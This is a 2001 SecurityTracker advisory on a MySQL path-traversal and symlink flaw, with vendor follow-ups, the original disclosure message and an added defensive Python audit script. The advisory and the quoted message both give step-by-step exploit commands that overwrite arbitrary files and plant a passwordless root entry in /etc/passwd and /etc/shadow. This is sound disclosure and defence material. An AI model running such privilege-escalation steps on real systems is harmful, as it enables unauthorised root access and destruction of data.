SecurityTracker.com
Category:   Application (Database)  >   MySQL
Vendors:   MySQL.com
MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
SecurityTracker Alert ID:  1001118
SecurityTracker URL:  http://securitytracker.com/id/1001118
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 19 2001
Impact:   Denial of service via local system, Modification of user information, User access via local system
Exploit Included:  Yes  
Version(s): mysql-3.20.32a
Description:   It is reported that any local MySQL user can exploit MySQL to write files on the server with the privileges assigned to the MySQL server (which may be root-level privileges in some cases). This can be used to gain additional access on the server.

MySQL reportedly accepts "../blah-blah" as a valid database name and table name (which is represented by 3 files: tablename.ISD, tablename.ISM and tablename.frm). However, when MySQL determines if the table name already exists or not, it only checks "tablename.frm".

Some demonstration exploit steps were provided in the original source message to ...

1) Overwrite any file:

$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

2) To obtain root-level privileges (if MySQL daemon is run as root)

$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$

Impact:   An authorized local user can use MySQL to write files to the server in a denial of service attempt or in an attempt to obtain additional privileges. If the MySQL daemon is run as root, then the user can obtain root-level privileges.
Solution:   No solution was available at the time of this entry. The author of the original source report makes several recommendations:
1) Patch MySQL to check all tablename files.
2) Patch MySQL to treat database names beginning with ".." as invalid database names.
3) Do not run the MySQL daemon as root.
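A defender-side audit for the issue described above, added here as an example and not part of this advisory or of MySQL itself: it rejects database names that are not a single plain path component (generalising recommendation 2) and walks a data directory flagging table files that are symlinks, resolve outside the directory, or lack their .frm/.ISD/.ISM siblings (the condition recommendation 1 addresses). The directory layout it builds is constructed for the demo; `is_safe_name`, `audit_datadir` and `build_demo_datadir` are names chosen here.

```python
import os
import tempfile

# The three files that make up one table in the affected MySQL versions.
TABLE_SUFFIXES = (".frm", ".ISD", ".ISM")


def is_safe_name(name: str) -> bool:
    """Reject database/table names that are not a single, plain path component."""
    if name in ("", ".", "..") or name.startswith(".."):
        return False
    return not any(c in name for c in "/\\\x00")


def audit_datadir(datadir: str) -> list:
    """Flag table files that are symlinks, resolve outside datadir, or lack siblings."""
    root = os.path.realpath(datadir)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        bases = {os.path.splitext(f)[0] for f in files
                 if os.path.splitext(f)[1] in TABLE_SUFFIXES}
        for base in sorted(bases):
            present = [s for s in TABLE_SUFFIXES if base + s in files]
            if len(present) != len(TABLE_SUFFIXES):
                findings.append(f"incomplete table {base}: only {present}")
            for s in present:
                path = os.path.join(dirpath, base + s)
                target = os.path.realpath(path)
                if os.path.islink(path):
                    findings.append(f"symlink {path} -> {target}")
                if not target.startswith(root + os.sep):
                    findings.append(f"escapes datadir {path} -> {target}")
    return findings


def build_demo_datadir() -> str:
    """Constructed sample layout (not a real server): a clean table plus a planted symlink."""
    tmp = tempfile.mkdtemp(prefix="mysql_audit_")
    db = os.path.join(tmp, "data", "somedb")
    os.makedirs(db)
    for s in TABLE_SUFFIXES:
        open(os.path.join(db, "clean" + s), "w").close()
    outside = os.path.join(tmp, "outside_target.txt")  # stands in for any file outside datadir
    open(outside, "w").close()
    os.symlink(outside, os.path.join(db, "gotcha.ISD"))  # .ISD without .frm: what the bug misses
    return os.path.join(tmp, "data")


if __name__ == "__main__":
    for bad in ("../../tmp", "..", "a/b"):
        print(bad, "safe" if is_safe_name(bad) else "rejected")
    for line in audit_datadir(build_demo_datadir()):
        print(line)
```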

Vendor URL:  mysql.com
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (FreeBSD), UNIX (Solaris - SunOS), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
The vendor notes that this vulnerability was corrected over a year ago. Version 3.23.x does not contain this bug.
Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
This is a follow-up message. A user reports that this vulnerability applies to mysql 3.23.32 [which is contrary to what the vendor has noted in a previous message].
(Vendor Fix Released) Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
The vendor has issued release 3.23.36 to correct several security issues.



 Source Message Contents

Subject:  potential vulnerability of mysqld running with root privileges


Anybody who gets a login and password to mysql can use it as a DoS or r00t
exploit, because mysql accepts '../blah-blah' as a valid database name and
each table is represented by 3 files: tablename.ISD, tablename.ISM and
tablename.frm. But when mysqld checks whether a table already exists or
not, it checks _only_ tablename.frm:

Using these "vulnerable features of mysql" to make a big DoS (will
overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!

Recommendations:
* Patch mysql so that when it checks whether a table is present, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names starting with '..' as incorrect
database names.
* And the main recommendation - do not run mysqld as root!!!

Patches:
 not yet

Workaround:
chown existing database tables to a normal user and run mysqld as this
unprivileged user - it will be a better solution!

Vulnerable versions:
This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of
mysql are also vulnerable.

Comments:
Mysql dox recommend not running mysqld as root, but people from RedHat
didn't read the mysql dox - mysql installed from rpm is vulnerable.
